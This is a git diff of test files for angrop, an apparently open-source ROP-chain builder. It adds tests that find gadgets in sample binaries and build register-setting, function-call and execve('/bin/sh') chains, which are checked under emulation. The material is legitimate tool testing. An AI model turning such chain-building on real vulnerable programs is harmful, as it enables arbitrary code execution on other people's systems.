len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'eax' @@ -174,6 +181,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x8052cac) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x14 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'ebp' @@ -200,6 +208,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x4c7b5a+1) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x24 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'r7' @@ -215,6 +224,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x1040c) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'r11' @@ -269,7 +279,7 @@ def test_syscall_gadget(): assert type(gadget) == SyscallGadget assert gadget.stack_change == 0 assert not gadget.can_return - assert len(gadget.concrete_regs) == 1 and gadget.concrete_regs.pop('rax') == 0x3b + assert len(gadget.prologue.concrete_regs) == 1 and gadget.prologue.concrete_regs.pop('rax') == 0x3b gadget = rop.analyze_gadget(0x521cef) assert type(gadget) == RopGadget @@ -283,13 +293,13 @@ def test_syscall_gadget(): assert type(gadget) == SyscallGadget assert gadget.stack_change == 0 assert not gadget.can_return - assert len(gadget.concrete_regs) == 1 and gadget.concrete_regs.pop('rax') == 0x3b + assert len(gadget.prologue.concrete_regs) == 1 and gadget.prologue.concrete_regs.pop('rax') == 0x3b gadget = rop.analyze_gadget(0x536715) assert type(gadget) == SyscallGadget assert gadget.stack_change == 0 assert not gadget.can_return - assert len(gadget.concrete_regs) == 1 and gadget.concrete_regs.pop('rsi') == 0x81 + assert len(gadget.prologue.concrete_regs) == 1 and gadget.prologue.concrete_regs.pop('rsi') == 0x81 proj = angr.Project(os.path.join(BIN_DIR, "tests", "cgc", "sc1_0b32aa01_01"), auto_load_libs=False) rop = proj.analyses.ROP() @@ -310,10 +320,187 @@ def test_pop_pc_gadget(): assert gadget.pc_offset == 0 assert gadget.stack_change == 0x18 +def test_reg_moves(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "arjsfxjr"), auto_load_libs=False) + rop = proj.analyses.ROP() + gadget = rop.analyze_gadget(0x4027c4) # mov esi, esi; mov edi, r15d; call qword ptr [r12 + rbx*8] + assert len(gadget.reg_moves) == 1 + + proj = angr.Project(os.path.join(BIN_DIR, "tests", "aarch64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=True, only_check_near_rets=False) + g = rop.analyze_gadget(0x4ebad4) + assert len(g.reg_moves) == 1 + +def test_oop_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "i386", "bronze_ropchain"), auto_load_libs=False) + rop = proj.analyses.ROP() + + for addr in [0x0806b397, 0x0806b395, 0x08091dd2, 0x08091f5a]: + g = rop.analyze_gadget(addr) + assert g and g.oop + +def test_negative_stack_change(): + # pylint: disable=pointless-string-statement + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + + # this is not a gadget because it is loading uninitialized memory + """ + sub sp, #0x50 + add fp, pc + b #0x4bf669 + ldr r3, [sp, #8] + mov r2, r7 + mov r1, r6 + mov r0, r5 + str r3, [sp] + mov r3, r8 + blx r4 + """ + g = rop.analyze_gadget(0x4bf661) + assert g is None + +def test_arm_jmp_mem(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + g = rop.analyze_gadget(0x456951) + assert g is None + +def test_num_mem_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "cgc", "sc1_0b32aa01_01"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, max_sym_mem_access=2) + + g = rop.analyze_gadget(0x8048500) + assert g is not None + assert g.has_symbolic_access() is True + assert g.num_sym_mem_access == 2 + assert len(g.mem_changes) == 2 + +def test_pac(): + # pylint: disable=pointless-string-statement + """ + add sp, sp, #0xc0 + autiasp + ret + """ + proj = angr.load_shellcode( + b'\xffC\x01\x91\xbf#\x03\xd5\xc0\x03_\xd6', + "aarch64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + assert len(rop._all_gadgets) == 1 + +def test_riscv(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "abgate-libabGateQt.so"), + load_options={'main_opts':{'base_addr': 0}}, + ) + rop = proj.analyses.ROP(fast_mode=False, cond_br=True, max_bb_cnt=5) + gs = rop.analyze_addr(0x5f7a) + g = gs[0] + assert 's0' in g.popped_regs + +def test_out_of_patch(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + # 0x000000000007c950 : mov rax, qword ptr [rip + 0x342849] ; ret + g = rop.analyze_gadget(0x000000000047c950) + assert g.oop is False + +def test_controller(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/datadep_test"), auto_load_libs=False) + rop = proj.analyses.ROP() + g = rop.analyze_gadget(0x400614) + + assert 'rax' in g.reg_controllers + s = g.reg_controllers['rax'] + assert len(s) == 1 and 'rax' in s + + assert 'rbx' in g.reg_controllers + s = g.reg_controllers['rbx'] + assert len(s) == 2 and 'rbx' in s and 'rsi' in s + + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel/manysum"), auto_load_libs=False) + rop = proj.analyses.ROP() + + g = rop.analyze_gadget(0x10558) + assert not g.reg_controllers + +def test_cdq(): + proj = angr.load_shellcode( + """ + pop rax + cdq + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert g is not None + assert 'rax' in g.popped_regs + assert 'rdx' not in g.popped_regs + +def test_invalid_ptr(): + proj = angr.load_shellcode( + """ + pop rcx; xor al, 0x52; movabs byte ptr [0xc997d3941b683390], al; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert g is None + +def test_cond_br_guard_pop_conflict(): + proj = angr.load_shellcode( + """ + ldr x3, [sp, #0x10]; + mov x15, x3; + add x3, x3, #2; + str x3, [sp, #0x10]; + ldr x24, [sp, #0x18]; + cmp x15, x24; + b.eq #0x24; + str x1, [x0]; + str x1, [x1]; + mov x0, #1; + ldr x30, [sp, #0x28]; + add sp, sp, #0x30; + ret + """, + "aarch64", + load_address=0, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + gs = rop.analyze_addr(0) + assert len(gs) == 1 + g = gs[0] + assert not g.reg_pops + +def test_riscv_zero_register(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", + "borgbackup2-chunker.cpython-312-riscv64-linux-gnu.so"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_bb_cnt=5, cond_br=True) + + gs = rop.analyze_addr(0x0000000000011f32) + assert len(gs) == 1 + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} for f in sorted(all_functions.keys()): + print(f) if hasattr(all_functions[f], '__call__'): all_functions[f]() diff --git a/tests/test_performance.py b/tests/test_performance.py new file mode 100644 index 00000000..ac3fbbaf --- /dev/null +++ b/tests/test_performance.py @@ -0,0 +1,105 @@ +import os +import time +import logging + +import angr +import angrop # pylint: disable=unused-import + +logging.getLogger("cle").setLevel("ERROR") + +BIN_DIR = os.path.join(os.path.dirname(__file__), "..", "..", "binaries") +CACHE_DIR = os.path.join(BIN_DIR, 'tests_data', 'angrop_gadgets_cache') + +def local_gadget_finding(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel/libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 20 + + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 5 + + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 35 + + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 5 + +def local_graph_optimization_missing_write(): + """ + this binary does not contain enough gadgets to form a write chain + """ + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/manywords"), auto_load_libs=False) + rop = proj.analyses.ROP() + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 5 + + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 1 + +def local_graph_optimization(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/ALLSTAR_389-dsgw_csearch"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False) + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 15 + + # this is about 25-26s + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 35 + +def local_write_optimize(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/ALLSTAR_389-dsgw_csearch"), auto_load_libs=False) + rop = proj.analyses.ROP() + + cache = '/tmp/ALLSTAR_389-dsgw_csearch.cache' + if os.path.exists(cache): + rop.load_gadgets(cache, optimize=False) + else: + rop.find_gadgets(processes=16, show_progress=True, optimize=False) + rop.save_gadgets(cache) + + start = time.time() + for _ in range(20): + rop.write_to_mem(0x41414141, b'AAAAAAA') + print(time.time() - start) + +def run_all(): + functions = globals() + all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} + for f in sorted(all_functions.keys()): + print(f) + if hasattr(all_functions[f], '__call__'): + all_functions[f]() + print("local_gadget_finding") + local_gadget_finding() + print("local_graph_optimization_missing_write") + local_graph_optimization_missing_write() + print("local_graph_optimization") + local_graph_optimization() + print("local_write_optimize") + local_write_optimize() + +if __name__ == "__main__": + import sys + + logging.getLogger("angrop.rop").setLevel(logging.DEBUG) + #logging.getLogger("angrop.gadget_analyzer").setLevel(logging.DEBUG) + + if len(sys.argv) > 1: + globals()['test_' + sys.argv[1]]() + else: + run_all() diff --git a/tests/test_rop.py b/tests/test_rop.py index 7ab88ba4..aa4304f8 100644 --- a/tests/test_rop.py +++ b/tests/test_rop.py @@ -90,10 +90,9 @@ def compare_gadgets(test_gadgets, known_gadgets): for test_gadget in test_gadget_dict[g.addr] if test_gadget.bbl_addrs == g.bbl_addrs ] - assert len(matching_gadgets) == 1 + assert len(matching_gadgets) == 1, matching_gadgets assert_gadgets_equal(g, matching_gadgets[0]) - def execute_chain(project, chain): s = project.factory.blank_state() s.memory.store(s.regs.sp, chain.payload_str()) @@ -244,12 +243,18 @@ def test_roptest_x86_64(): verify_execve_chain(c) def test_roptest_aarch64(): + # pylint: disable=pointless-string-statement cache_path = os.path.join(test_data_location, "aarch64_glibc_2.19") proj = angr.Project(os.path.join(public_bin_location, "aarch64", "libc.so.6"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=True, only_check_near_rets=False) + """ + 0x4b7ca8: ldp x19, x30, [sp]; add sp, sp, #0x20; ret + 0x4ebad4: add x0, x19, #0x260; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret + """ rop.analyze_gadget(0x4b7ca8) rop.analyze_gadget(0x4ebad4) + rop.chain_builder.optimize() data = claripy.BVS("data", 64) chain = rop.set_regs(x0=data) @@ -269,6 +274,55 @@ def test_roptest_aarch64(): chain = rop.execve(path=b'/bin/sh') verify_execve_chain(chain) +def test_acct_sa(): + """ + just a system test + """ + proj = angr.Project(os.path.join(public_bin_location, "x86_64", "ALLSTAR_acct_sa"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + cache_path = os.path.join(test_data_location, "ALLSTAR_acct_sa") + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path) + else: + rop.find_gadgets() + rop.save_gadgets(cache_path) + + chain = rop.set_regs(rax=0x41414141) + assert chain is not None + state = chain.exec() + assert state.regs.rax.concrete_value == 0x41414141 + + chain = rop.func_call(0xdeadbeef, [0x41414141, 0x42424242, 0x43434343]) + assert chain is not None + state = chain.concrete_exec_til_addr(0xdeadbeef) + assert state.regs.rdi.concrete_value == 0x41414141 + assert state.regs.rsi.concrete_value == 0x42424242 + assert state.regs.rdx.concrete_value == 0x43434343 + +def test_liblog(): + """ + yet another system test + the difficulty here is that it needs to be able to normalize a jmp_mem gadget that requries moves + """ + proj = angr.Project(os.path.join(public_bin_location, "x86_64", + "ALLSTAR_android-libzipfile-dev_liblog.so.0.21.0"), + auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + cache_path = os.path.join(test_data_location, "ALLSTAR_liblog") + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path) + else: + rop.find_gadgets() + rop.save_gadgets(cache_path) + + chain = rop.set_regs(rdx=0x41414141) + assert chain is not None + + chain = rop.func_call(0xdeadbeef, [0x41414141, 0x42424242, 0x43434343]) + assert chain is not None + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} diff --git a/tests/test_ropblock.py b/tests/test_ropblock.py index e4c5d7c1..76be1e65 100644 --- a/tests/test_ropblock.py +++ b/tests/test_ropblock.py @@ -43,6 +43,127 @@ def test_reg_mover(): except RopException: pass +def test_expand_ropblock(): + proj = angr.load_shellcode( + """ + pop rdi; ret + mov eax, edi; ret + pop rbx; ret + add rsp, 8; ret + mov rdx, rax; mov esi, 1; call rbx + pop rsi; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rsi=0x42424242, rdx=0x43434343) + assert chain is not None + +def test_block_effect(): + proj = angr.load_shellcode( + """ + pop rax + pop rbx + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rax=0x41414141) + rb = RopBlock.from_chain(chain) + data = rb._values[2].ast + rb._blank_state.solver.add(data == 0x42424242) + rb._analyze_effect() + assert not rb.popped_regs + +def test_normalized_block_effect(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x536408) #: mov r8, r14; mov rsi, r15; call qword ptr [r12 + 0xf0] + rop.analyze_gadget(0x41f668) #: pop r12; ret + rop.analyze_gadget(0x0000000000401b96) # pop rdx; ret + rop.analyze_gadget(0x0000000000422b5a) # pop rdi; ret + rop.analyze_gadget(0x000000000043cdc9) # mov qword ptr [rdi + 8], rdx; ret + rop.chain_builder.optimize() + + chain = rop.move_regs(r8='r14', rsi='r15') + assert chain is not None + +def test_stack_offset_infinite_loop(): + cache_path = os.path.join(CACHE_DIR, "libdevel-leak-perl-Leak.so") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "libdevel-leak-perl-Leak.so"), + auto_load_libs=False, load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, + only_check_near_rets=False, cond_br=True, max_bb_cnt=5) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(optimize=False) + rop.save_gadgets(cache_path) + + addrs = [g.addr for g in rop._all_gadgets] + assert 0xf30 in addrs + + # if stack_offset is not properly calculated, it may lead to infinite loops + # when handling 0xf30 + rop.optimize() + +def test_normalized_block_effect2(): + cache_path = os.path.join(CACHE_DIR, "riscv_autotalent-autotalent.so") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "autotalent-autotalent.so"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, + only_check_near_rets=False, cond_br=True, max_bb_cnt=5) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(processes=16, optimize=False) + rop.save_gadgets(cache_path) + + gs = rop.analyze_addr(0x4ae6) + g = gs[0] + rb = rop.chain_builder._reg_setter.normalize_gadget(g) + assert 'a0' not in rb.popped_regs + +def test_normalized_block_with_conditional_branch(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "aarch64", + "libastring-ocaml-astring.cmxs"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, + only_check_near_rets=False, cond_br=True, max_bb_cnt=5) + + rop.analyze_addr(0x0000000000023d28) + rop.analyze_addr(0x00000000000189a4) + rop.analyze_addr(0x0000000000020880) + + rop.chain_builder.optimize() + chain = rop.set_regs(x0=0x41414141, x5=0x42424242) + assert chain is not None + +def test_jmp_reg_normalize_fast_path(): + cache_path = os.path.join(CACHE_DIR, "mipsel_btrfs-tools_btrfs-calc-size") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "mipsel", "btrfs-tools_btrfs-calc-size"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(processes=16, optimize=False) + rop.save_gadgets(cache_path) + + rop.optimize(processes=1) + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')}